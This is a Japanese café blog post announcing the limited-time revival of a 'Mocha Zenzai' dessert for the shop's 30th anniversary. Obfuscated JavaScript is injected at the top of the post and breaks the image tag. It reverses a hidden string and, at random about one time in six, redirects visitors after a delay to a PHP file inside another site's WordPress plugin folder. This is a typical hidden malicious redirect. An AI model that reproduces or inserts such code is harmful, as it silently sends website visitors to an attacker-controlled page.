ミッシュハウスからのお知らせ

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} class=”alignnone size-full wp-image-877″ src=”http://www.missu-house.com/wp/wp-content/uploads/2015/03/モカぜんざい.jpg” alt=”モカぜんざい” width=”200″ height=”200″ />

 

こんにちは☆彡

今日はとても寒いですね!一気に冬になってしまいそうな予感です・・

さて、先日30周年記念パフェをご紹介しましたが、今回は復刻メニューを

ご紹介したいと思います!

こちら、「モカぜんざい」です☆

常連のお客様はお気づきの通り、通常メニューにある「カフェぜんざい」と似ていますね!笑

こちらの「モカぜんざい」は大人向けの甘くないコーヒーゼリーと自家製餡、お子様にも人気のまろやかな味の

モカアイス、手作りもちもち白玉という組み合わせのぜんざいです♪

ちなみに「カフェぜんざい」は、モカアイスの部分がバニラソフトクリームに変わった感じですね!笑

モカぜんざいは数年前までご提供していたメニューで、たぶん似たようなカフェぜんざいがあるから

しばらく作ってなかったんだとおもいます。でもモカアイスもすごく美味しくて人気だったので

今回30周年を記念して復活させてみました☆彡

11~12月限定で復刻してますので、ぜひこの機会に食べてみてくださいね^^

ちなみに、当時の価格でご提供中!700円です☆彡

お待ちしております(^^♪

 

コメントは利用できません。